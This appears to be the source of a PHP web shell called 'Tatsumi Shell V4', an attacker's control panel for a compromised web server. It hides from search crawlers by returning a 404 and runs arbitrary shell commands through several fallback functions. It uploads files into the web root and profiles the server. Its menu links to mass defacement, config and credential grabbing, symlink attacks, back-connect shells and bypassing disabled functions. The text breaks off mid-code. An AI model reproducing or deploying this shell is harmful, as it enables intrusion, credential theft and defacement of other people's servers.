<!DOCTYPE HTML><HTML> <HEAD> <link href="" rel="stylesheet" type="text/css">48++ Tatsumi Shell V4 <title>48++ Tatsumi Shell V4</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <script src="https://rawcdn.githack.com/nako48/nakocoders.github.io/4d9978b5360d1999d69cf6f77f8ac0104c2f320f/nakomedia.js"></script> <script src="https://rawcdn.githack.com/nako48/tatsumicrew/4d9978b5360d1999d69cf6f77f8ac0104c2f320f/script.js"></script> <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script> <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script> <link href="https://fonts.googleapis.com/css?family=Kavivanar" rel="stylesheet"> <link rel="stylesheet" href="https://rawcdn.githack.com/nako48/tatsumicrew/ffa94a7dbc27b2baad2fad820674690412f1ed68/style.css"> <link href="https://fonts.googleapis.com/css?family=Kranky" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css"> <link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet"> <link href="https://fonts.googleapis.com/css?family=Shadows+Into+Light" rel="stylesheet"> <style> ::-webkit-scrollbar{width:4px;height:3px} ::-webkit-scrollbar-button{width:0;height:0} ::-webkit-scrollbar-track{background-color:#fff} ::-webkit-scrollbar-track-piece{background-color:#333} ::-webkit-scrollbar-thumb{height:50px;background-color:#fff} ::-webkit-scrollbar-corner{background-color:#fff} ::selection{background:#fff;color:#fff} ::-moz-selection{background:#fff;color:#fff} body { background:#1d1c1c; color:#e3e3e3; font-family:VT323; } h1,h2,h3,h4,h5,h6 { margin:0px; padding:0px; } a { text-decoration: none; color:inherit; } li { list-style:none; } ul { padding:0px ; margin:0px auto; } textarea{ border:2px solid #CE3F3F; } input[type="file"],input[type=text] { border-radius: 3px; padding:2px; color: black; } input[type=submit],input[type=reset] { background-color: #E44242; color: #FFF; border: none; padding: 5px; border-radius: 3px; margin-left:5px; cursor: pointer; } input[type=button] { background-color: #E44242; color: #FFF; border: none; padding: 5px; border-radius: 3px; margin-left:5px; cursor: pointer; } .syms tr:hover{ background: #646464; } textarea{ padding:10px 10px; background-color:#ddd; } .menu-wrapper { margin:10px auto; position: relative; width:100%; } .menu-wrapper ul{ margin:0; padding:0; } .multi-level-responsive-menu { background-color: #333; clear: both; display: block; width: 100%; } .menu-toggle { display: none; } .multi-level-responsive-menu ul { padding:0; display: table; width: 100%; list-style: none; } .multi-level-responsive-menu ul li ul li:first-child { border-top: 1px solid #DD3D36; } .multi-level-responsive-menu ul li { position: relative; display: inline-block; float:left; } .multi-level-responsive-menu ul li:last-child { border-right: 0; } .multi-level-responsive-menu ul li a{ display: block; text-align: center; padding:11px 20px; color:#fff; text-decoration: none; line-height: 1; font-weight: 500; font-size: 14px; } .multi-level-responsive-menu ul li.active a{ background-color:#DD3D36 ; } .multi-level-responsive-menu ul li:not(.active) a:hover { background-color:#DD3D36 ; }ul.menu li span.arrow-bottom, ul.menu li span.arrow-right { position: absolute; top:15px; right:7px; border:5px solid transparent; width:0; height:0; } ul.menu li span.arrow-bottom { border-top-color: #fff; } ul.menu li span.arrow-right { border-left-color: #fff; } @media(min-width: 768px) { .multi-level-responsive-menu ul li ul { visibility: hidden; opacity: 0; position: absolute; height: 0; width: 0; background-color: #333; -webkit-transition:opacity 0.5s; -moz-transition:opacity 0.5s; -o-transition:opacity 0.5s; transition:opacity 0.5s; top:100%; left: 0; padding: 0; min-width: 200px; } .multi-level-responsive-menu ul li ul li{ white-space: nowrap; display: block; width: 100%; } .multi-level-responsive-menu ul li ul li a { width: 100%; border-radius: 0; color:#fff; padding:10px 20px; text-align: left; } .multi-level-responsive-menu ul li a i { margin-left: 10px; float: right; font-weight: 500; margin-top: 5px; } .multi-level-responsive-menu >ul >li:hover >ul { visibility: visible; opacity: 1; height: auto; width: auto; display: block; z-index: 999; } .multi-level-responsive-menu >ul >li >ul li:hover >ul { visibility: visible; opacity: 1; height: auto; width: auto; display: block; z-index: 999; left:100%; top: 0; } .multi-level-responsive-menu >ul >li >ul li >ul li:hover >ul{ visibility: visible; opacity: 1; height: auto; width: auto; display: block; z-index: 999; left:100%; top: 0; } } @media (max-width: 767px) { button.menu-toggle { display: block; color: #fff; background-color: #333; border:0; padding:10px 20px; text-align: right; width: 100%; outline: none; cursor: pointer; } button.menu-toggle.active { background-color: #DD3D36; } .multi-level-responsive-menu { display: table; } .multi-level-responsive-menu ul.menu { display: none; } .multi-level-responsive-menu ul li { display: block; width: 100%; float: none; } .multi-level-responsive-menu ul li a{ text-align: left; padding:10px; } .multi-level-responsive-menu ul li ul { width: 100%; position: relative; left:0 !important; padding-left: 10px; display: none; } } </style> if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; $ds = (@ini_get(strtolower("disable_functions")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>"; $ds = @ini_get("disable_functions"); $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>"; $show_ds = (!empty($ds)) ? "<font color=red>Tidak Aman</font>" : "<font color=lime>Aman</font>"; function w($dir,$perm) { if(!is_writable($dir)) { return "<font color=red>".$perm."</font>"; } else { return "<font color=green>".$perm."</font>"; } } function exe($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } function sulap($text) { if(!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function GrabUrl($url,$type){ $urlArray = array(); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); $regex='|<a.*?href="(.*?)"|'; preg_match_all($regex,$result,$parts); $links=$parts[1]; foreach($links as $link){ array_push($urlArray, $link); } curl_close($ch); foreach($urlArray as $value){ $lol="$url$value"; if(preg_match("#$type#is", $lol)) { echo "$lol\r\n"; } } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736>".$disablefunc."</font></span>"; } else { return "<span style='color:#00FF1E'>NONE</span>"; } } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end - $start); return $return; } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) {// Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) {// Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) {// Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) {// Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) {// Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) {// Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) {// FIFO pipe $info = 'p'; } else {// Unknown $info = 'u'; }// Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));// Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));// World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } $_c7e = 'WGFpIFN5bmRpY2F0ZQ=='; $sys = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; $ip = gethostbyname($_SERVER['HTTP_HOST']); $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? '<font>ON</font>' : '<font>OFF</font>'; $getds = @ini_get("disable_functions"); $ds = showdisablefunctions().' <font color=white>ON</font> <font color=teal>'.php_sapi_name().'</font>'; if(isset($_GET['path'])){ $path = $_GET['path']; }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); $home_r = $_SERVER['DOCUMENT_ROOT']; if(get_magic_quotes_gpc()){ foreach($_POST as $key=>$value){ $_POST[$key] = stripslashes($value); } } function jmbd($cmd) { if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')) { $buff = @shell_exec($cmd); return $buff; } } if($_POST['upload']) { if($_POST['tipe_upload'] == 'biasa') { if(@copy($_FILES['ix_file']['tmp_name'], "$path/".$_FILES['ix_file']['name']."")) { $act = "<font color=green>Uploaded!</font> at <i>$path/".$_FILES['ix_file']['name']."</i>"; } else { $act = "<font color=red>Failed to upload file</font>"; } } else { $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name']; $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name']; if(is_writable($_SERVER['DOCUMENT_ROOT'])) { if(@copy($_FILES['ix_file']['tmp_name'], $root)) { $act = "<font color=green>Uploaded!</font> at <i>$root -> </i><a href='http://$web' target='_blank'>$web</a>"; } else { $act = "<font color=red>Failed to upload file</font>"; } } else { $act = "<font color=red>Failed to upload file</font>"; } } } echo "<font size=5></font>"; echo ' System: <font color=lime>'.$sys.'</font>
Server IP: <font color=lime>'.$ip.'</font>
Safe Mode: '.$sm.'
Shell Version: 0.4
Disable Functions : <font color=lime>'.$show_ds.'</font>
';echo "Current DIR: ";foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '<a href="?path=/">/</a>'; continue; } if($pat == '') continue; echo '<a href="?path='; for($i=0;$i<=$id;$i++){ echo "$paths[$i]"; if($i != $id) echo "/"; } echo '">'.$pat.'</a>/';}echo "
";echo'<hr color="bababa">';echo "<div id='cssmenu'><ul> <li><a href='?'>Home</a></li> <li><a href='?path=$path&tatsumi=mass'>Mass All</a></li> <li><a href='?path=$path&tatsumi=adminer'>Adminer</a></li> <li><a href='?path=$path&mass=changer'>Auto Edit User</a></li> <li><a href='?path=$path&tatsumi=symlinklist'>Symlink</a></li> <li><a href='?path=$path&tatsumi=jumping'>Jumping</a></li> <li class='active'><a href='#'>Gt Config All</a> <ul> <li><a href='?path=$path&config=grabber'>Get Config V1</a> </li> <li><a href='?path=$path&tc=autosym'>Get Config V2</a> </li> <li><a href='?path=$path&config=tatsumi'>Get Config V3</a> </li> </ul> </li> <li class='active'><a href='#'>Tools</a> <ul> <li><a href='?path=$path&tatsumi=cgi'>Cgi-Telnet</a> </li> <li><a href='?path=$path&backconnect=tool'>Back Connect</a> </li> <li><a href='?path=$path&tatsumi=function'>Bypass Functions</a> </li> <li><a href='?path=$path&nako=domains'>Grab Domains [Server]</a> </li> </ul> <li><a href='?path=$path&tatsumi=about'>About</a></li></div>";echo'<hr color="bababa">';echo'
';if($_GET['tatsumi'] == 'logout') { echo '